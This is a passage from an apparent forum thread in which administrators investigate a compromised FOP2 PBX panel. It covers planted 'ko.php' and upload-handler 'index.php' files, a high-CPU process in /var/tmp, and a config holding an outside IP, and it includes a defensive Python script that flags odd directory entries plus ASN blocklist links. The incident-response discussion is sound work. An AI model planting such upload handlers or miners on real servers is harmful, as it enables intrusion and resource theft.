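        print(ip, "recon hits:", len(info["recon"]), "lang POSTs:", info["lang_posts"])
```

Feed it the rotated access logs as well as the live one; the POST that planted the file can predate the mtime of the altered JS asset by a long time, as the later replies in this thread about 2019-era file dates suggest.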

Following this closely as we have a PBX with the same.

Well I think this is something from older versions. I just compared a couple boxes. The first box had FOP2 installed back around 2017 (it isn’t running now but still installed) and I found this ko.php file in the lang directory. It is neither a proper language file nor is it encrypted/obfuscated. It is just a minified version of the code that makes it hard to read and figure out what is really going on. There is also an index.php file in there that isn’t supposed to be.

The second box had a new version of FOP2 installed back in 2020, that one is running and has the latest release (2.31.33), it was running 2.31.30 before that. There is no ko.php or index.php file in the lang directory.

On the compromised box, it happened back in 2019 based on the file dates. About 8 months before I did a new install on a different system and just moved the license. So do you have an index.php in your lang directory? What is the timestamp on the ko.php and index.php (if you have one)?

Had very high CPU Usage from /var/tmp/php. Killed those processes and locked down FOP2 from only known IPs. Found files in /var/tmp/systemd-private-ef50f4158f904467b082dac1f3946076-httpd.service-huuOR9/tmp that were config.json and php. Both time stamped today, the php right before the problem started happening. The php is not readable. The config.json file contained a hard coded IP that is “212.32.255.5”, which is located in Europe - certain that is not our IP. Can I kill these since they are in tmp?

My FOP2 version was just updated and is the most recent, 2.31.33

My box is 3 years old and FOP2 is updated each time an update comes out.

ko.php is 125kb, time stamped 6/28/2020, just like all other files in the directory, except that the it.php file is time stamped 11/5/2020. I echo the comments when trying to read ko.php.

Well the ko.php is the result of the attack not the attack vector. So something else is the cause and the ko.php was the compromise to the system. But both you and I have boxes that were hit years ago on older versions. It’s why I’m looking for more details from the OP.

-rw-rw-r-- 1 asterisk asterisk   2393 Jun 28  2020 da.php
-rw-rw-r-- 1 asterisk asterisk   2539 Jun 28  2020 de.php
-rw-rw-r-- 1 asterisk asterisk   3848 Jun 28  2020 el.php
-rw-rw-r-- 1 asterisk asterisk     50 Jun 28  2020 en.php
-rw-rw-r-- 1 asterisk asterisk   4618 Jun 28  2020 es.php
-rw-rw-r-- 1 asterisk asterisk   4226 Jun 28  2020 fr_FR.php
-rw-rw-r-- 1 asterisk asterisk   2582 Jun 28  2020 he.php
-rw-r--r-- 1 asterisk asterisk    418 Jun 28  2020 index.php
-rw-rw-r-- 1 asterisk asterisk   2497 Nov  5  2020 it.php
-rw-r--r-- 1 asterisk asterisk 127283 Jun 28  2020 ko.php
-rw-rw-r-- 1 asterisk asterisk   2424 Jun 28  2020 nl.php
-rw-rw-r-- 1 asterisk asterisk   2477 Jun 28  2020 pl.php
-rw-rw-r-- 1 asterisk asterisk   3193 Jun 28  2020 pt_BR.php
-rw-rw-r-- 1 asterisk asterisk   6122 Jun 28  2020 ru.php
-rw-rw-r-- 1 asterisk asterisk   2434 Jun 28  2020 zh.php
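An added example, not a post in this thread: an outlier check over the lang/ listing just above. The two files a later reply in this thread says are not part of the FOP2 package (index.php and ko.php) differ from the other entries in mode (-rw-r--r-- against -rw-rw-r--), and ko.php is about fifty times the size of a real language file, so comparing each entry against its neighbours surfaces both without knowing the package manifest. The listing is the one posted above; the size factor of 10 is my chosen threshold.

```python
"""Flag entries in an `ls -l` listing whose mode, owner, group or size
does not match the rest of the directory.
"""
import re
from collections import Counter
from statistics import median
from typing import Dict, List

LS_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<date>\w{3}\s+\d{1,2}\s+[\d:]+)\s+(?P<name>.+)$"
)


def parse_ls(listing: str) -> List[dict]:
    """Parse `ls -l` lines into dicts; lines that do not match are skipped."""
    rows = []
    for line in listing.splitlines():
        m = LS_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["size"] = int(row["size"])
            rows.append(row)
    return rows


def flag_outliers(rows: List[dict], size_factor: float = 10.0) -> Dict[str, List[str]]:
    """Return {name: [reasons]} for files whose mode, owner or group differs
    from the directory's most common value, or whose size exceeds
    size_factor times the median size."""
    if not rows:
        return {}
    usual = {key: Counter(r[key] for r in rows).most_common(1)[0][0]
             for key in ("mode", "owner", "group")}
    med = median(r["size"] for r in rows)
    flags: Dict[str, List[str]] = {}
    for r in rows:
        reasons = []
        for key, value in usual.items():
            if r[key] != value:
                reasons.append("%s %s differs from the usual %s" % (key, r[key], value))
        if med > 0 and r["size"] > size_factor * med:
            reasons.append("size %d is %.0fx the median of %d" % (r["size"], r["size"] / med, med))
        if reasons:
            flags[r["name"]] = reasons
    return flags


# The lang/ listing posted above in this thread, reproduced as input.
LANG_LISTING = """\
-rw-rw-r-- 1 asterisk asterisk   2393 Jun 28  2020 da.php
-rw-rw-r-- 1 asterisk asterisk   2539 Jun 28  2020 de.php
-rw-rw-r-- 1 asterisk asterisk   3848 Jun 28  2020 el.php
-rw-rw-r-- 1 asterisk asterisk     50 Jun 28  2020 en.php
-rw-rw-r-- 1 asterisk asterisk   4618 Jun 28  2020 es.php
-rw-rw-r-- 1 asterisk asterisk   4226 Jun 28  2020 fr_FR.php
-rw-rw-r-- 1 asterisk asterisk   2582 Jun 28  2020 he.php
-rw-r--r-- 1 asterisk asterisk    418 Jun 28  2020 index.php
-rw-rw-r-- 1 asterisk asterisk   2497 Nov  5  2020 it.php
-rw-r--r-- 1 asterisk asterisk 127283 Jun 28  2020 ko.php
-rw-rw-r-- 1 asterisk asterisk   2424 Jun 28  2020 nl.php
-rw-rw-r-- 1 asterisk asterisk   2477 Jun 28  2020 pl.php
-rw-rw-r-- 1 asterisk asterisk   3193 Jun 28  2020 pt_BR.php
-rw-rw-r-- 1 asterisk asterisk   6122 Jun 28  2020 ru.php
-rw-rw-r-- 1 asterisk asterisk   2434 Jun 28  2020 zh.php
"""

if __name__ == "__main__":
    for name, reasons in flag_outliers(parse_ls(LANG_LISTING)).items():
        print(name + ":", "; ".join(reasons))
```

The mode difference is the more reliable signal here: a dropped file is created with the web server's umask rather than the package installer's, so it rarely matches its neighbours even when an attacker backdates the timestamp.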

Seems to match the same as what I’m seeing @xptpa2020. I’m getting that high cpu usage as well, did you kill those services and delete those files? Any other problems cropping up?

@BlazeStudios I do have an index.php. Are you saying that you think the ko.php and index files were maliciously inserted on the server years ago?

Killed services. Deleted files. CPU down to 0.1, from 12.5. Trying to anticipate the next move to ensure tomorrow is not a difficult day. I have emailed Nic at Asternic and am waiting for a response. I referred him to this page for better data than I am capable of providing alone.

I think I’ll drop to a backup and lock down fop2. But if these files, like ko.php and index.php, are malicious, then perhaps I should reinstall FOP2 as well.

Thanks for reaching out to Nic, please update us as you learn new info from him.

Yes, I do not see these files on a newer box. The index.php file is actually a form handler that allows the bad actor to upload files to directories they specify and can get access to. It’s not part of the FOP2 package. ko.php is also not part of the package.

Our old Dutch/Finnish/Russian friends behind AS60781 again, not the first time, unlikely the last one...

(FWIW I drop them at my DO firewall)

Please share your blocking setup at your firewall

https://www.enjen.net/asn-blocklist/index.php?asn=60781&type=iptables

Big enough that you should prefer an ipset

https://www.enjen.net/asn-blocklist/index.php?asn=60781&type=ipset